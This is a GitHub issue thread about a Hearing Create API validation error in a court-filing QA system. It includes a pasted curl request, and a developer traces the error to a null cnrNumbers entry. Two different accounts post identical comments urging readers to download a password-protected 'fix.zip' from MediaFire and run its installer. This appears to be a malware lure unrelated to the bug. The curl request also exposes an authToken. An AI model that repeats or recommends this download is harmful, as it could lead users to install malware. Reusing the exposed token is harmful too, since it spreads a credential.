### ISSUE TITLE
QA || Hearing Create API ERROR for scheduling a new hearing

### ISSUE THREAD

**Issue by bhuvanyuguru** [pucardotorg/Dristi_kerala#778]
After ending admission hearing, and scheduling a new hearing getting this API error in Hearing Create API 

URL : 
https://dristi-kerala-qa.pucar.org/hearing/v1/create?tenantId=kl&_=1724661636535

Response: {
    "ResponseInfo": null,
    "Errors": [
        {
            "id": null,
            "parentId": null,
            "code": "VALIDATION_ERROR",
            "message": "Error while validating cnrNumbers/filingNumbers",
            "description": null,
            "params": null
        }
    ]
}

CURL : `curl "https://dristi-kerala-qa.pucar.org/hearing/v1/create?tenantId=kl&_=1724662553553" ^
  -H "accept: application/json, text/plain, */*" ^
  -H "accept-language: en-US,en;q=0.9" ^
  -H "content-type: application/json;charset=UTF-8" ^
  -H "origin: https://dristi-kerala-qa.pucar.org" ^
  -H "priority: u=1, i" ^
  -H "referer: https://dristi-kerala-qa.pucar.org/digit-ui/employee/orders/generate-orders?filingNumber=F-C.1973.002-2024-000370&orderNumber=ORDER-NO-2024-08-26-000177" ^
  -H ^"sec-ch-ua: ^\^"Chromium^\^";v=^\^"128^\^", ^\^"Not;A=Brand^\^";v=^\^"24^\^", ^\^"Google Chrome^\^";v=^\^"128^\^"^" ^
  -H "sec-ch-ua-mobile: ?0" ^
  -H ^"sec-ch-ua-platform: ^\^"Windows^\^"^" ^
  -H "sec-fetch-dest: empty" ^
  -H "sec-fetch-mode: cors" ^
  -H "sec-fetch-site: same-origin" ^
  -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" ^
  --data-raw ^"^{^\^"hearing^\^":^{^\^"tenantId^\^":^\^"kl^\^",^\^"filingNumber^\^":^[^\^"F-C.1973.002-2024-000370^\^"^],^\^"cnrNumbers^\^":^[null^],^\^"hearingType^\^":^\^"ADMISSION^\^",^\^"status^\^":true,^\^"attendees^\^":^[^{^\^"name^\^":^\^"PARTY_1^\^",^\^"type^\^":^\^"Complainant^\^"^},^{^\^"individualId^\^":^\^"IND-2024-08-26-000273^\^",^\^"name^\^":^\^"Guru B Adv^\^",^\^"type^\^":^\^"Advocate^\^"^}^],^\^"startTime^\^":1724803200000,^\^"endTime^\^":1724803200000,^\^"workflow^\^":^{^\^"action^\^":^\^"CREATE^\^",^\^"assignes^\^":^[^],^\^"comments^\^":^\^"Create new Hearing^\^",^\^"documents^\^":^[^{^}^]^},^\^"documents^\^":^[^]^},^\^"tenantId^\^":^\^"kl^\^",^\^"RequestInfo^\^":^{^\^"apiId^\^":^\^"Rainmaker^\^",^\^"authToken^\^":^\^"1232ee54-f790-4b7f-8c11-2923e6cad18f^\^",^\^"msgId^\^":^\^"1724662553553^|en_IN^\^",^\^"plainAccessRequest^\^":^{^}^}^}^"`

![Image](https://github.com/user-attachments/assets/859cbf16-0500-45b0-a729-5b8c5101b98d)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by radheshjoshi1** [comment]
the cnrNumber array is not correct as it is sending null element inside the array

**Comment by bhuvanyuguru** [comment]
resolved in QA
